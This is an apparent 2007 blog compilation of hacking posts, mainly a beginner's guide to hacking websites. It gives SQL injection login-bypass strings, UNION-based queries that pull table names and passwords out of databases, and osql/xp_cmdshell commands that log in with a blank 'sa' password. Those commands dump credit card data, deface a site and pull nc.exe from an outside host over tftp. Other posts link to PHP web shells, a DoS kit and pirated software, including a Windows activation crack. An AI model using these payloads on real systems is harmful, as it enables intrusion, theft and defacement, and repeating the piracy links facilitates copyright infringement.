Friday, October 19, 2007

hiding folder

Right Click on the desktop.Make a new folder
2)Now rename the folder with a space(U have to hold ALT key and type 0160).
3)Now u have a folder with out a name.
4)Right click on the folder>properties>customize. Click on change icon.
5)Scroll a bit, u should find some empty spaces, Click on any one of them.click ok

Thats it, now u can store ur personal data without any 3rd party tools.

U can also hide ur folder by dis method:-


open Start>Run>CMD
now type attrib +s +h C:/name of d folder u want to hide

Now even in the folder option Show all Hide folders is slected still u will get dis folder hide...


And to unhide type same command juzz put "-" instead of "+"

Hack Websites

Hack Websites
Ok ppl...many guys ve asked me hw 2 hack websites n email ids n stuff....
so beginners heres ur chance....
I hope dis guide helps u:
Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “unbreakable” But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.

The article is divided into two parts:
1. Using the HTTP port 80
2. Using the MS SQL port 1434

Part I – Using HTTP port 80 ( Or better would be malformed URLs)
----------------------------------------------------------------

This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don't require any other tools except IE or Netscape.
Normally, inorder to make a login page, the web designer will write the following code.

login.htm











logincheck.asp
<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")

set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>

Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "

Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!

The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide

Chintan ' --
Chintan " --

or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm

More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45

in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page.


The same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'.

OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line

>From the error its clear that first table is 'logintable'.
It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--

output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name will type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name as 'login_name'. To get the third field name we will write

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5


Thats the login name "Rahul" and to get the password of Rahul the query would be

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port)
-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are

sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)

xp_msver -> Shows the MS SQL server version including the all info about the OS.
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.

xp_regdeletevalue ->Delets a registry value

xp_regread -> Reads a registry value

xp_regwrite -> Writes a registry key.

xp_terminate_process -> Stops a process

Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.

Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.


Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank “”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.

Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.

C:>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type

C:\> osql.exe –S 198.188.178.1 –U sa –P “”
1>
Thats what we get if we login successfully else we will get an error message as login failed for user “sa”

Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”


I would prefer to use –Q option instead of –q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the “information_schema.tables” to get the list of tables and contents of it.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”

And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”

And

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”

Output:

Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Write something in index.html file ?

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”

Wanna upload any file on the remote system.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”

And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.

Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.

Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.

Precautionay measures
---------------------------

<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.

Remember security is not an add-on feature. It depends upon the smartness of administrator. The war between the hacker and administrator will go on and on and on…. The person who is aware with the latest news or bug reports will win the war. Database admins should keep in touch with some sites like

http://sqlsecurity.com
http://www.cert.org

hacking guid

A Guide To Hacking
I have seen many members post threads telling that they are new to the community and if any one could give a guide to hacking. Here is a post which should be good enough to give you a start. Please do comment. Originally posted at http://digireach.blogspot.com
People who are neophytes to Hacking are from the age group 14-18, ‘most’ of them. And many others approach this field with a different definition in mind. I can’t blame them, because they are exposed to this different meaning. If you think Hacking is “obtaining unauthorized access to a system, and steal sensitive information”, then you belong to this category.

So, what is actually hacking? It can be roughly defined as the technique to make a system to do what one wants. A computer hacker is necessarily a programmer, someone who has enough knowledge on most computer languages.
If you want a start, start with learning the basics of HTML (short for Hyper Text Markup Language). Follow this with the basics of the programming language called Python. Back this up with a second language, Java. Then you can move on to difficult and complex things like C and C++. You need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages. Other languages that you can learn include LISP and Perl.
Don’t feel disheartened by looking at the volume you have to learn. At every point of time you will love what you are learning. As I told start with HTML and Python, and you will definitely feel the thump to learn more. If you are currently using Windows, then it’s time to think above this. Move on to Linux and Unix Operating System. Unix codes and directory structure knowledge is also necessary for hacking. Well start with DOS, that will be a good idea! Learn about various tools which windows provides. (Take care when you use them.) Use Regedit and Gpedit(for XP) to hack your own computer. Well Education begins at home! By hacking your computer, what I mean is to customize your own computer, so that it looks and feels different.

Move on. Learn what command prompt is and how it can be used. Step forward to telnet, nslookup, netstat commands and how they can be effectively used to do, and get what you want!

Let’s get serious. Take a break and read about how to become a hacker by Eric Steven Raymond. Here is the link.
http://catb.org/~esr/faqs/hacker-howto.html.

It is not necessary you get to understand everything that has been explained by Eric. But, you shall surely understand what it all means soon. Now you might be feeling. Is learning programming and programming open source programs is all about hacking? Well it is a part of it. Consider this realistic example taken from www.hackthissite.org. It is something like this. A girl creates a website, were she posts poems written by her about world peace. But some crackers have cracked into her website and changed the contents into something not what the site intended to do. With her site off her hands it’s going awry. So you have to use your skills to get her site back to her and fix the security holes to prevent crackers from cracking it again.
Hackers on request or by self try different programming problems finding a solution, one that is best. Fixing security holes in websites and programs, identifying and protecting the internet from malicious programs etc. all become a part.

OK. Now let’s have a quick look.
1. HTML
2. Python
3. Java
4. C
5. C++
6. LISP
7. Perl
8. UNIX & LINUX (OS)
9. Telnet
10. Read a lot. Use powerful search tool like www.google.com and www.searchmash.com to arrive at what you need.
11. Sign up at www.hackthissite.org , it shall be helpful.

Webhacking tools

Very RARE to get these...grab it..

Apache Hacking TooLz Directory:

Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script


Remote File Inclusion And Remote Command Execution Directory :

IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter


Databases & SQL Injection & XSS TooLz Directory

Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL

PHP Shells

**** v2.0
c99shell #16
Backdoor php v0.1
r57shell
ajan
casus15
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
phpRemoteView
nstview php shell


Download:
http://rapidshare.com/files/2447667/WebHacking_TooLz.rar

Rapidshare Hack: Bypass 1 Hour Download Limit

Ever wanted to bypass the annoying limit on how much you can download on Rapidshare, and don’t want to wait until the next hour to download a second part of a file? Then try this trick. It doesnt work if u use a proxy though.

For Windows XP:

1. Launch Command Prompt: Start > All Programs > Accessories > Command Prompt

2. When Command Prompt is opened, Copy and Paste this in the Command Prompt:

——– Start Copy after this line ——-
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
exit
——– Stop Copy before this line ——-

3. Command Prompt does the rest from here.

How to search Rapidshare

As we all know that Rapidshare is a free hosting service that offers free as well as paid accounts. The premium users have special privileges and costs few $$ per month.

Most of the people want to know that how they can search rapidshare for their popular files, softwares, songs, mp3 albums, scripts, games etc.

If you want to search for all rapidshare links athat are posted on websites, forums, blogs etc then type “rapidshare.de/files” and you will get all the links.

If you want to see which urls of rapidshare has been indexed by google then use:

site: http://rapidshare.de


Rapidshare hacking trick for Firefox

There is a firefox plugin named greasemonkey that helps you to bypass timelimit and allow you to download multiple files using free rapidshare account. You may call it as rapidshare hacking for firefox users. Rapid share and firefox users can download that plugin and enjoy unlimited downloads without any time limits.
However this greasemonkey plugin is available for firefox users only, internet explorer users may switch to firefox to enjoy this free rapidshare hack.

Rapidshare Searches
You need links to download files from rapidshare. One common method is to use google to search rapidshare.de by using googles site search command.
site:rapidshare.de RAR
This would search rapidshare.de for every link / page that includes the word rar.

You can also search google for sites that index rapidshare downloads, I won´t get into detail about those sites because they mostly link to illegal downloads. Try the search string “rapidshare links” for example.

Downloading RapidShare Files With Resume Capability
With this technique you could download RapidShare files with resume capability and Support for Download Accelerators, I personally found this technique quiet useful thought it would be useful for you too (especially people on Dailup).

Well these are the things you would need for this tutorial:
* A hosting with php support (well try this free php host
www.profreehosting.info)
* Rapid leech script http://rapidleech.com
* Grabber : tool/" target="_blank">http://www.blogiseverything.com/software-tools/rapidshare-link-grabber-a-rapidshare-download-tool/

Then follow these steps:
1. Logon to your hosting
2. Upload all the files of RapidLeech Script in the desired directory
3. Chmod the folder to 777 and also chmod index.php to 777
4. Get the link using Rapidshare Link Grabber
5. Go to www.yoursitenamehere.com/RapidLeechFolder
6. Paste the link in the textbox and press download






ehough







Why CMS The Grabber?
1. Skip download timer, download straight away. (Primary reason)
2. Multiple proxies, thus allowing you to download multiple files at once.
3. Work with both rapidshare.de and rapidshare.com.
4. Able to transfer the download session to your favorite Download Manager.
5. It’s Free.

Download:
http://rapidshare.com/files/12702535/cmsgr-win32-147c-21-jan-2007-16-07-cet.rar

SECURITY AND HACKING BOOKS

SECURITY AND HACKING BOOKS
http://lam3r5.blogspot.com/

BOOKS
http://rapidshare.com/files/1074575/Addison.Wesley.Defend.I.T.Security.by.Example.May.2004.eBook-DDU.chm
http://rapidshare.com/files/1074567/sec1.rar
http://rapidshare.com/files/1074568/sec2.rar
http://rapidshare.com/files/1074569/sec3.rar
HIDDEN GOOGLE QUERRIES...
This can be called google hacker nice tool.
http://rapidshare.com/files/1074570/Alt-Google.rar
KEY LOGGERS...
Well parents are concerned about their childerns. So to moniter what they do use this. U can even use these to get to know if some1 is breaking in2 your system, how? because these tools moniter the keystrokes... u will come to know how just install them and ----> readme....
http://rapidshare.com/files/1074571/KeyLoggerS2.rar
Dos tester: (dont use this untill u know what u are doing)
dont use this:: warning: dont use these: GOOGLE FOR Dos first and know what is dos and use them afterwards if u want. THESE ARE FOR PENETRATION TESTING AND NETWORK TESTING ONLY. I am not responsible for the adverse effects caused.
http://rapidshare.com/files/1074572/FlooD_DoS.rar
WEBSITE CRACKER TESTER:
u have a own web site. well use this to test if its secure... break in with this and u will know....
[content suppressed]
MESSENGER TOOLS
Some of the messenger tools....
http://rapidshare.com/files/1074574/messenger_tools.rar
SOME BASIC TOOLS
http://rapidshare.com/files/1074576/tools1.rar

hacking data base

Chicago Voter Database Hacked
http://abcnews.go.com/Politics/story?id=2601085

Is The Metasploit Hacking Tool Too Good?
http://www.informationweek.com/news/showArticle.jhtml?articleID=193401125

Researcher attempts to shed light on security troll
http://www.theregister.co.uk/2006/10/23/linguist_fingers_security_troll/

Microsoft to share "security lessons" with New Zealand government
http://computerworld.co.nz/news.nsf/news/22761C817C53E02FCC25720D0002280E

Why Metasploit Publishes Hacker Tools
http://www.informationweek.com/showArticle.jhtml?articleID=193400966

Deficit of young IT minds can't fill demand
http://desmoinesregister.com/apps/pbcs.dll/article?AID=/20061022/BUSINESS04/610220325/1001/NEWS

National Australia Bank hit by DDoS attack
http://www.zdnet.com.au/news/security/soa/National_Australia_Bank_hit_by_DDoS_attack/0,130061744,339271790,00.htm

British Standard produces network security book
http://www.techworld.com/networking/news/index.cfm?newsID=7144

security,networking,e-books and video of hacking

security,networking,e-books and video of hacking
Hacking - web applications (hacking exposed).zip
download: http://w11.easy-share.com/886462.html


Networking e-books
Downloadlink to the File:http://rapidshare.com/users/6HEZQI
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx






Programing e-books
Downloadlink to the File:http://rapidshare.com/users/OCEDU4
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx


Security e-books
Downloadlink to the File:http://rapidshare.com/users/P7M9C8
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx


Cisco e-books
Downloadlink to the File:http://rapidshare.com/users/KF1YLD
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

3D Modeling e-books
Downloadlink to the File:http://rapidshare.com/users/QDWE65
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx






Windows_Server_2003_Active_Derectory_Infrastructure70-294
hxxp://rapidshare.com/files/14746635/Windows_Server_2003_Active_Derectory_Infrastructure70-294.rar





Make Your 30days trail xp and server 2003 into full version:
hxxp://rapidshare.com/files/14747482/Windows_XP__all__and_Widnwos_2003_Server___all__activate_cra.rar



UNIX LINUX BOOKS
http://www.giuciao.com/books/sorted.php?by=Linux&ord=id

WINDOWS BOOKS
http://www.giuciao.com/books/sorted.php?by=WinXP&ord=id

WINDOWS SERVER BOOKS
http://www.giuciao.com/books/sorted.php?by=Win2003&ord=id

HACKING BOOKS
Hacking&ord=id" target="_blank">http://www.giuciao.com/books/sorted.php?by=Hacking&ord=id

CISCO BOOKS
http://www.giuciao.com/books/sorted.php?by=Cisco&ord=id

PHP BOOKS
http://www.giuciao.com/books/sorted.php?by=php&ord=id

SQL BOOKS
http://www.giuciao.com/books/sorted.php?by=sql&ord=id

JAVA BOOKS
http://www.giuciao.com/books/sorted.php?by=Java&ord=id

C, C++, C# BOOKS
http://www.giuciao.com/books/sorted.php?by=Cplus&ord=id

.NET BOOKS
http://www.giuciao.com/books/sorted.php?by=dotNET&ord=id

ORACLE BOOKS
http://www.giuciao.com/books/sorted.php?by=Oracle&ord=id
HTML XML BOOKS
http://www.giuciao.com/books/sorted.php?by=HTML_XML&ord=id



PERL BOOKS
http://www.giuciao.com/books/sorted.php?by=Perl&ord=id

PYTHON BOOKS
http://www.giuciao.com/books/sorted.php?by=Python&ord=id

DESIGN & CAD BOOKS
http://www.giuciao.com/books/#Design__CAD

COMPUTER ENGINEERING BOOKS
TO DOWNLOAD COMPUTER ENGINEERING BOOKS USE THE FOLLOWING LINK
http://www.flazx.com/category112.php

MOBILE COMPUTING E BOOKS LINK
TO DOWNLOAD MOBILE COMPUTING E BOOKS USE THE FOLLOWING LINK
http://www.flazx.com/category127.php

CCNA BOOKS LINK
TO DOWNLOAD CCNA BOOKS USE THE FOLLOWING LINK
http://www.flazx.com/search.php?p=CCNA&submit=Search

FLASH BOOKS LINK
TO ACCESS THE BOOKS ON FLAH AND MACROMEDIA USE THE FOLLOWING LINK
http://koobe.eu/search.php?q=flash&search=Search

BOOKS ON COREL DRAW
USE THE FOLLOWING LINK TO ACCESS COREL DRAW BOOKS.
http://koobe.eu/search.php?q=COREL+DRAW&search=Search


70-270
hxxp://rapidshare.com/files/15848355/70-270-s.pdf

70290Training
hxxp://rapidshare.com/files/14985753/70290Training.rar

Configuring_and_Troubleshooting_Windows_XP_Professional:
hxxp://rapidshare.com/files/14404635/Configuring_and_Troubleshooting_Windows_XP_Professional.pdf

70-292___70-296_-_Microsoftpress_-_Training_kit
hxxp://rapidshare.com/files/14671805/70-292___70-296_-_mspress_-_Training_kit.rar

Implementing_Managing_Maintaining_Microsoft_Windows_Serve :
hxxp://rapidshare.com/files/14687367/Implementing__Managing___Maintaining_Microsoft_Windows_Serve.rar

Managing_Maintaining_Microsoft_Windows_Server_2003_Environ
hxxp://rapidshare.com/files/14740650/Managing___Maintaining_Microsoft_Windows_Server_2003_Environ.rar

Windows_Server_2003_Active_Derectory_Infrastructure70-294
hxxp://rapidshare.com/files/14746635/Windows_Server_2003_Active_Derectory_Infrastructure70-294.rar

MCSE-Exam_Questions-2003
hxxp://rapidshare.com/files/14752032/MCSE-Exam_Questions-2003.rar
Windows_Server_2003-slides
hxxp://rapidshare.com/files/14874653/Windows_Server_2003-slides.rar

IP-V6
hxxp://rapidshare.com/files/14748920/IPv6.rar

Key finder
(or)
hxxp://rapidshare.com/files/14529966/kf151.rar

Claw Game (with cheat codes) :
hxxp://rapidshare.com/files/14402146/Claw.rar

Make Your 30days trail xp and server 2003 into full version:
hxxp://rapidshare.com/files/14747482/Windows_XP__all__and_Widnwos_2003_Server___all__activate_cra.rar

Virtual Drive:
hxxp://rapidshare.com/files/14066833/Virtual_Drive_7.rar

Partition Magic :
hxxp://rapidshare.com/files/13885748/Partitionmagic.rar

McAfee:
hxxp://rapidshare.com/files/14250965/MCAFEE_2006_IS_8.exe

Boson_Simulator
hxxp://rapidshare.com/files/15225961/boson_simulator.rar


01tn001
hxxp://rapidshare.com/files/16393666/01tn001.pdf

Ethical_Hacking_Student_Guide
hxxp://rapidshare.com/files/16393668/Ethical_Hacking_Student_Guide.pdf

Hacking_Exposed
hxxp://rapidshare.com/files/16393670/Hacking_Exposed.pdf

Hacking_For_Dummies
hxxp://rapidshare.com/files/16393671/Hacking_For_Dummies.pdf

Home_Networking_Bible 2nd_ed_2004
hxxp://rapidshare.com/files/16393672/Home_Networking_Bible__2nd_ed_2004.pdf

Ms_press_-_microsoft_encyclopedia_of_security
hxxp://rapidshare.com/files/16393673/ms_press_-_microsoft_encyclopedia_of_security.pdf

Network_Security_Bible_2005
hxxp://rapidshare.com/files/16393674/Network_Security_Bible_2005.pdf

Network_Security_Tools_2005
hxxp://rapidshare.com/files/16393675/Network_Security_Tools_2005.chm

Network-Dummies
hxxp://rapidshare.com/files/16393677/Network-Dummies.rar

Ethical_Hacking_Student_Guide
hxxp://rapidshare.com/files/15146418/Ethical_Hacking_Student_Guide.rar

Security_in_computing_3ed
hxxp://rapidshare.com/files/16394708/Security_in_computing_3ed.chm
All sort of learning and Hacking books
you can download from

http://rapidshare.com/files/16858952/Teach_yourself_C___in_21_days.rar

http://rapidshare.com/files/16858953/Teach_Yourself_Java_in_21_Days.rar

http://rapidshare.com/files/16858954/Teach_Yourself_Shell_Programming_in_24_Hours.rar

http://rapidshare.com/files/16860185/Web_Desing.rar

http://rapidshare.com/files/17091457/Hacker_Black_Book.rar

http://rapidshare.com/files/17578702/Basic_of_telnet.rar

http://rapidshare.com/files/17641653/free-hex-editor.rar

Books of ankit fadia
you can download books on hacking

http://rapidshare.com/files/18545409/Ankit_Fadias_ebooks.rar



Easy way to learn cracking
In this guide you will learn to crack and all the tools require for cracking are present in it

http://rapidshare.com/files/18851263/Cracking.rar


Connect to the server by easy way
This is telnet client use this to connect ant server at any port

http://rapidshare.com/files/19210333/Telnet_Client.rar


Learn cracking
this file contain all the tutorial and tools need for cracking

http://rapidshare.com/files/19215011/Cracking.rar


Dos Attack
increase your attack by learning dos command

http://rapidshare.com/files/19867572/Dos_command.rar


Learn Hacking
Learn Hacking By Watching The Vedio

http://rapidshare.com/files/19210335/Vedio_hacking.rar


Learn to program Fake Login
it contain script example and method to make a fake login

http://rapidshare.com/files/20111917/Fake_login.rar

Hacking step by step
follow this step and you will find that you become a hacker

http://rapidshare.com/files/20311024/Hacking_Step_By_Step.rar


Learn about server security and break into it
http://rapidshare.com/files/22078419/Computer_Security1.rar
O'really hacking books
OReilly Digital Video Hacks.chm
Oreilly Firefox Hacks.chm
oreilly flash hacks.chm
OReilly Google Hacks 2nd Edition.chm
OReilly Halo 2 Hacks.chm
OReilly IRC Hacks.chm
O'Reilly Network Security Hacks.chm
Oreilly Paypal Hacks.chm
OReilly PC Hacks.chm
OReilly PDF Hacks.chm
OReilly Podcasting Hacks.chm
OReilly Retro Gaming Hacks.chm
OReilly Spidering Hacks.chm
OReilly Visual Studio Hacks Mar.2005.chm
O'Reilly Windows Server Hack.chm
Oreilly Windows XP Hacks 2nd.edition.chm
OReilly Wireless Hacks 100 Industrial - Strength Tips and Tools.chm
Swing Hacks.chm
Word Hacks - O'Reilly.chm
Yahoo Hacks.chm

http://rapidshare.com/files/22096039/Really_hacks1.rar


learn how to trace ip
http://rapidshare.com/files/22078423/Tracing_ip1.rar

Download any files from rapidshare without wating
this is a tool but you should know little about ip spoofeing

